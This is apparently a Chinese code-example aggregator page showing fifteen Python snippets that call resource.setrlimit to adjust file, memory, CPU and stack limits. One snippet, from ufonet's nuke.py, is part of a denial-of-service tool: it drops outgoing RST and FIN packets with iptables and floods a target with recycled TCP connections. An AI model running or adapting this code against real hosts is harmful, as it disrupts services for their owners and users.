当前位置: 首页>>代码示例>>Python>>正文


Python resource.setrlimit函数代码示例

本文整理汇总了Python中resource.setrlimit函数的典型用法代码示例。如果您正苦于以下问题:Python setrlimit函数的具体用法?Python setrlimit怎么用?Python setrlimit使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。


在下文中一共展示了setrlimit函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。

示例1: test_configurations_signed_data

    def test_configurations_signed_data(self):
        # Use a limit of ~4GiB
        limit = 4000 * 1024 * 1024
        resource.setrlimit(resource.RLIMIT_AS, (limit, limit))

        cs = ParamSklearnClassifier.get_hyperparameter_search_space(
            dataset_properties={'signed': True})

        print(cs)

        for i in range(10):
            config = cs.sample_configuration()
            config._populate_values()
            if config['classifier:passive_aggressive:n_iter'] is not None:
                config._values['classifier:passive_aggressive:n_iter'] = 5
            if config['classifier:sgd:n_iter'] is not None:
                config._values['classifier:sgd:n_iter'] = 5

            X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits')
            cls = ParamSklearnClassifier(config, random_state=1)
            print(config)
            try:
                cls.fit(X_train, Y_train)
                X_test_ = X_test.copy()
                predictions = cls.predict(X_test)
                self.assertIsInstance(predictions, np.ndarray)
                predicted_probabiliets = cls.predict_proba(X_test_)
                self.assertIsInstance(predicted_probabiliets, np.ndarray)
            except ValueError as e:
                if "Floating-point under-/overflow occurred at epoch" in \
                       e.args[0] or \
                       "removed all features" in e.args[0] or \
                                "all features are discarded" in e.args[0]:
                    continue
                else:
                    print(config)
                    print(traceback.format_exc())
                    raise e
            except RuntimeWarning as e:
                if "invalid value encountered in sqrt" in e.args[0]:
                    continue
                elif "divide by zero encountered in" in e.args[0]:
                    continue
                elif "invalid value encountered in divide" in e.args[0]:
                    continue
                elif "invalid value encountered in true_divide" in e.args[0]:
                    continue
                else:
                    print(config)
                    print(traceback.format_exc())
                    raise e
            except UserWarning as e:
                if "FastICA did not converge" in e.args[0]:
                    continue
                else:
                    print(config)
                    print(traceback.format_exc())
                    raise e
            except MemoryError as e:
                continue
开发者ID:automl,项目名称:paramsklearn,代码行数:60,代码来源:test_classification.py

示例2: _restore_rlimits

    def _restore_rlimits(self):
        try:
            import resource

            resource.setrlimit(resource.RLIMIT_NOFILE, (self.soft_max_open_files, self.hard_max_open_files))
        except ImportError:
            pass
开发者ID:djay0529,项目名称:mdanalysis,代码行数:7,代码来源:test_analysis.py

示例3: init_tests

    def init_tests(self):
        """ Initialize testing infrastructure - sockets, resource limits, etc. """
        # Init Twisted factory.
        self.server_factory = network.TestServerFactory(controller = self)
        #self.client_factory = TestClientFactory(controller = self)

        ports = sorted(self.test_ports)
        log.notice("Binding to test ports: %s", ", ".join(map(str, ports)))
        # Sort to try privileged ports first, since sets have no
        # guaranteed ordering.
        for port in ports:
            reactor.listenTCP(port, self.server_factory)

        # Set RLIMIT_NOFILE to its hard limit; we want to be able to
        # use as many file descriptors as the system will allow.
        # NOTE: Your soft/hard limits are inherited from the root user!
        # The root user does NOT always have unlimited file descriptors.
        # Take this into account when editing /etc/security/limits.conf.
        (soft, hard) = resource.getrlimit(resource.RLIMIT_NOFILE)
        log.verbose1("RLIMIT_NOFILE: soft = %d, hard = %d", soft, hard) 
        if soft < hard:
            log.debug("Increasing RLIMIT_NOFILE soft limit to %d.", hard)
            resource.setrlimit(resource.RLIMIT_NOFILE, (hard, hard))                

        log.debug("Initializing test threads.")
        # TODO: Configure me!
        scheduler_class = getattr(scheduler, config.scheduler)
        self.scheduler = scheduler_class(controller = self,
                                         max_pending_factor = config.max_pending_factor,
                                         export_interval = config.export_interval)
        T = threading.Thread
        self.schedule_thread = T(target = Controller.test_schedule_thread,
                                 name = "Scheduler", args = (self,))
        self.watchdog_thread = T(target = Controller.watchdog,
                                 name = "Watchdog", args = (self,))
开发者ID:codarrenvelvindron,项目名称:torbel,代码行数:35,代码来源:controller.py

示例4: set_open_files_limit

def set_open_files_limit(desired_limit):
    """
    On POSIX systems, set the open files limit to the desired number, unless
    it is already equal to or higher than that.

    Setting a high limit enables Flintrock to launch or interact with really
    large clusters.

    Background discussion: https://github.com/nchammas/flintrock/issues/81
    """
    soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_NOFILE)

    if soft_limit < desired_limit:
        if desired_limit > hard_limit:
            warnings.warn(
                "Flintrock cannot set the open files limit to {desired} "
                "because the OS hard limit is {hard}. Going with {hard}. "
                "You may have problems launching or interacting with "
                "really large clusters."
                .format(
                    desired=desired_limit,
                    hard=hard_limit),
                category=RuntimeWarning,
                stacklevel=2)
        resource.setrlimit(
            resource.RLIMIT_NOFILE,
            (min(desired_limit, hard_limit), hard_limit))
开发者ID:nchammas,项目名称:flintrock,代码行数:27,代码来源:flintrock.py

示例5: process_limit

    def process_limit(self):
        # If our parent changed sucide
        if self.ppid != os.getppid():
            _logger.info("Worker (%s) Parent changed", self.pid)
            self.alive = False
        # check for lifetime
        if self.request_count >= self.request_max:
            _logger.info("Worker (%d) max request (%s) reached.", self.pid, self.request_count)
            self.alive = False
        # Reset the worker if it consumes too much memory (e.g. caused by a memory leak).
        rss, vms = memory_info(psutil.Process(os.getpid()))
        if vms > config['limit_memory_soft']:
            _logger.info('Worker (%d) virtual memory limit (%s) reached.', self.pid, vms)
            self.alive = False      # Commit suicide after the request.

        # VMS and RLIMIT_AS are the same thing: virtual memory, a.k.a. address space
        soft, hard = resource.getrlimit(resource.RLIMIT_AS)
        resource.setrlimit(resource.RLIMIT_AS, (config['limit_memory_hard'], hard))

        # SIGXCPU (exceeded CPU time) signal handler will raise an exception.
        r = resource.getrusage(resource.RUSAGE_SELF)
        cpu_time = r.ru_utime + r.ru_stime
        def time_expired(n, stack):
            _logger.info('Worker (%d) CPU time limit (%s) reached.', self.pid, config['limit_time_cpu'])
            # We dont suicide in such case
            raise Exception('CPU time limit exceeded.')
        signal.signal(signal.SIGXCPU, time_expired)
        soft, hard = resource.getrlimit(resource.RLIMIT_CPU)
        resource.setrlimit(resource.RLIMIT_CPU, (cpu_time + config['limit_time_cpu'], hard))
开发者ID:befks,项目名称:odoo,代码行数:29,代码来源:server.py

示例6: get_contest

    def get_contest(self):
        """See docstring in class Loader.

        """
        # Unset stack size limit
        resource.setrlimit(resource.RLIMIT_STACK, (resource.RLIM_INFINITY,
                                                   resource.RLIM_INFINITY))

        self.buildpath = os.path.join(self.path, "build")
        # We have to avoid copying the folder contest/build
        # or contest/task/build into contest/build.
        # For this reason, we ignore all files and directories named "build"
        # when copying recursively.
        copyrecursivelyifnecessary((self.path), self.buildpath,
                                   set(["build"]))
        with chdir(self.buildpath):
            rules = ".rules"
            if not os.path.exists(rules):
                os.mkdir(rules)
            rules = os.path.abspath(rules)
            self.contestconfig = ContestConfig(rules,
                                               os.path.basename(self.path))
            self.contestconfig._readconfig("contest-config.py")
            tasknames = [t.name for t in self.contestconfig.tasks]
            usernames = [u.username for u in self.contestconfig.users]
            return self.contestconfig._makecontest(), tasknames, usernames
开发者ID:ioi-germany,项目名称:cms,代码行数:26,代码来源:GerLoader.py

示例7: launch_downloader_daemon

def launch_downloader_daemon():
    # Increase the maximum file descriptor count (to the max)
    # NOTE: the info logging is REQUIRED for some unknown reason, if it is not
    # done here, no further logging can be done in the daemon and it gets stuck.
    try:
        import resource
        logging.info('Increasing file descriptor count limit in Downloader')
        resource.setrlimit(resource.RLIMIT_NOFILE, (10240, -1))
    except ValueError:
        logging.warn('setrlimit failed.')

    # Make sure we don't leak from the downloader eventloop
    from miro import eventloop

    def beginLoop(loop):
        loop.pool = Foundation.NSAutoreleasePool.alloc().init()
    eventloop.connect('begin-loop', beginLoop)
    eventloop.connect('thread-will-start', beginLoop)

    def endLoop(loop):
        del loop.pool
    eventloop.connect('end-loop', endLoop)
    eventloop.connect('thread-did-start', endLoop)
    
    # And launch
    from miro.dl_daemon import Democracy_Downloader
    Democracy_Downloader.launch()

    # Wait for the event loop thread to finish.
    # Although this is theorically not necessary since the event loop thread is
    # a non-daemon thread, situations where the downloader daemon exits right
    # after its launch as this function returns have been seen in the wild.
    eventloop.join()
开发者ID:cool-RR,项目名称:Miro,代码行数:33,代码来源:Miro.py

示例8: limit

	def limit(self):
		resource.setrlimit(resource.RLIMIT_AS, (self.memorylimit.value, self.memorylimit.value + 16777216))
		resource.setrlimit(resource.RLIMIT_CPU, (self.cpulimit.value, self.cpulimit.value + 1.0))
		os.chroot("/tmp/pjudge/")
		os.setgid(305)
		os.setuid(305)
		return 0
开发者ID:jackyyf,项目名称:pjudge,代码行数:7,代码来源:judge.py

示例9: testClushConfigSetRlimit

    def testClushConfigSetRlimit(self):
        """test CLI.Config.ClushConfig (setrlimit)"""
        soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
        hard2 = min(32768, hard)
        f = tempfile.NamedTemporaryFile(prefix='testclushconfig')
        f.write("""
[Main]
fanout: 42
connect_timeout: 14
command_timeout: 0
history_size: 100
color: auto
fd_max: %d
verbosity: 1
""" % hard2)

        f.flush()
        parser = OptionParser("dummy")
        parser.install_display_options(verbose_options=True)
        parser.install_connector_options()
        options, _ = parser.parse_args([])
        config = ClushConfig(options, filename=f.name)
        self.assert_(config != None)
        display = Display(options, config)
        self.assert_(display != None)

        # force a lower soft limit
        resource.setrlimit(resource.RLIMIT_NOFILE, (hard2/2, hard))
        # max_fdlimit should increase soft limit again
        set_fdlimit(config.fd_max, display)
        # verify
        soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
        self.assertEqual(soft, hard2)
        f.close()
开发者ID:jasonshih,项目名称:clustershell,代码行数:34,代码来源:CLIConfigTest.py

示例10: setlimits

def setlimits():
    cpu_limit = current_app.config.get('SKYLINES_SUBPROCESS_CPU', 120)
    mem_limit = current_app.config.get('SKYLINES_SUBPROCESS_MEMORY', 256) \
        * 1024 * 1024

    resource.setrlimit(resource.RLIMIT_CPU, (cpu_limit, cpu_limit * 1.2))
    resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit * 1.2))
开发者ID:imclab,项目名称:skylines,代码行数:7,代码来源:analysis.py

示例11: __set_max_open_files

    def __set_max_open_files(self):
        # Let's check to see how our max open files(ulimit -n) setting is
        mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
        log.info(
            'Current values for max open files soft/hard setting: '
            '{0}/{1}'.format(
                mof_s, mof_h
            )
        )
        # Let's grab, from the configuration file, the value to raise max open
        # files to
        mof_c = self.opts['max_open_files']
        if mof_c > mof_h:
            # The configured value is higher than what's allowed
            log.warning(
                'The value for the \'max_open_files\' setting, {0}, is higher '
                'than what the user running salt is allowed to raise to, {1}. '
                'Defaulting to {1}.'.format(mof_c, mof_h)
            )
            mof_c = mof_h

        if mof_s < mof_c:
            # There's room to raise the value. Raise it!
            log.warning('Raising max open files value to {0}'.format(mof_c))
            resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h))
            mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
            log.warning(
                'New values for max open files soft/hard values: '
                '{0}/{1}'.format(mof_s, mof_h)
            )
开发者ID:abh,项目名称:salt,代码行数:30,代码来源:master.py

示例12: initialize

    def initialize(self):
        # initialize the base class
        GPP_base.initialize(self)
        self._popen_lock = threading.Lock()

        # Setup the TMPDIR environment variable for use in diskCapacity requests
        if not os.environ.has_key("TMPDIR"):
            os.environ["TMPDIR"] = tempfile.gettempdir()

        nproc = resource.getrlimit(resource.RLIMIT_NPROC)
        if nproc[0] < nproc[1]:
            #Max the softlimit out
            resource.setrlimit(resource.RLIMIT_NPROC, (nproc[1], nproc[1]))
        if nproc[1] < 1024:
            self._log.warning("Your system nproc hard limit [%s} is set abnormally low", nproc[1])

        ######################
        # Set initial capacities
        self.memCapacity = int(self.memTotal * self.memThresholdDecimal)    # starts out as the same value
        self.loadCapacity = self.loadTotal * self.loadThresholdDecimal
        self.mcastnicIngressCapacity = int(self.mcastnicIngressTotal * self.mcastNicThresholdDecimal)
        self.mcastnicEgressCapacity = int(self.mcastnicEgressTotal * self.mcastNicThresholdDecimal)
        self.init_processor_flags()

        self.next_property_event = None

        self.start()
开发者ID:VenturaSolutionsInc,项目名称:framework-GPP,代码行数:27,代码来源:GPP.py

示例13: action

    def action(self):
        '''
        Return the functions and the returners loaded up from the loader
        module
        '''
        # if this is a *nix system AND modules_max_memory is set, lets enforce
        # a memory limit on module imports
        # this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
        modules_max_memory = False
        if self.opts.value.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
            log.debug(
                    'modules_max_memory set, enforcing a maximum of {0}'.format(
                        self.opts.value['modules_max_memory'])
                    )
            modules_max_memory = True
            old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
            rss, vms = psutil.Process(os.getpid()).get_memory_info()
            mem_limit = rss + vms + self.opts.value['modules_max_memory']
            resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
        elif self.opts.value.get('modules_max_memory', -1) > 0:
            if not HAS_PSUTIL:
                log.error('Unable to enforce modules_max_memory because psutil is missing')
            if not HAS_RESOURCE:
                log.error('Unable to enforce modules_max_memory because resource is missing')

        self.opts.value['grains'] = salt.loader.grains(self.opts.value)
        self.grains.value = self.opts.value['grains']
        self.modules.value = salt.loader.minion_mods(self.opts.value)
        self.returners.value = salt.loader.returners(self.opts.value, self.modules.value)

        # we're done, reset the limits!
        if modules_max_memory is True:
            resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
开发者ID:AccelerationNet,项目名称:salt,代码行数:33,代码来源:core.py

示例14: nukeize

def nukeize(ip, port, rounds):
    n=0
    try: # RFC793 will lacks an exception if reset is not sent
        resource.setrlimit(resource.RLIMIT_NOFILE, (100000, 100000)) # modify kernel ulimit to: 100000
        os.system("iptables -A OUTPUT -d %s -p tcp --dport %d --tcp-flags RST RST -j DROP"%(ip, port)) # modify IPTABLES
        os.system("iptables -A OUTPUT -d %s -p tcp --dport %d --tcp-flags FIN FIN -j DROP"%(ip, port))
        epoll = select.epoll()
        connections = {}
        for x in range (0,int(rounds)):
            try:
                n=n+1
                s = connect(ip, port)
                print "[Info] [AI] [NUKE] Firing 'nuke' ["+str(n)+"] -> [SHOCKING!]"
                connections[s.fileno()] = s 
                epoll.register(s.fileno(), select.EPOLLOUT|select.EPOLLONESHOT)
                while True:
                    n=n+1
                    events = epoll.poll(1)
                    for fileno, event in events:
                        s = connections.pop(s.fileno())
                        print "[Info] [AI] [NUKE] Firing 'nuke' ["+str(n)+"] -> [SHOCKING!]"
                        if s:
                            s.close()
                            s = connect(ip, port)
                            connections[s.fileno()] = s
                            epoll.register(s.fileno(), select.EPOLLOUT|select.EPOLLONESHOT)                
            except:
                print "[Error] [AI] [NUKE] Failed to engage with 'nuke' ["+str(n)+"]"
        os.system('iptables -D OUTPUT -d %s -p tcp --dport %d --tcp-flags FIN FIN -j DROP' %(ip, port)) # restore IPTABLES
        os.system('iptables -D OUTPUT -d %s -p tcp --dport %d --tcp-flags RST RST -j DROP' %(ip, port))
    except:
        print("[Error] [AI] [NUKE] Failing to engage... -> Is still target online? -> [Checking!]")
开发者ID:epsylon,项目名称:ufonet,代码行数:32,代码来源:nuke.py

示例15: set_limits

 def set_limits ():
     import resource as r
     if self.cpu > 0:
         r.setrlimit (r.RLIMIT_CPU, [self.cpu, self.cpu])
     if self.mem > 0:
         mem_bytes = self.mem * 1024 * 1024
         r.setrlimit (r.RLIMIT_AS, [mem_bytes, mem_bytes])
开发者ID:edmcman,项目名称:seahorn,代码行数:7,代码来源:__init__.py


注:本文中的resource.setrlimit函数示例由纯净天空整理自Github/MSDocs等开源代码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。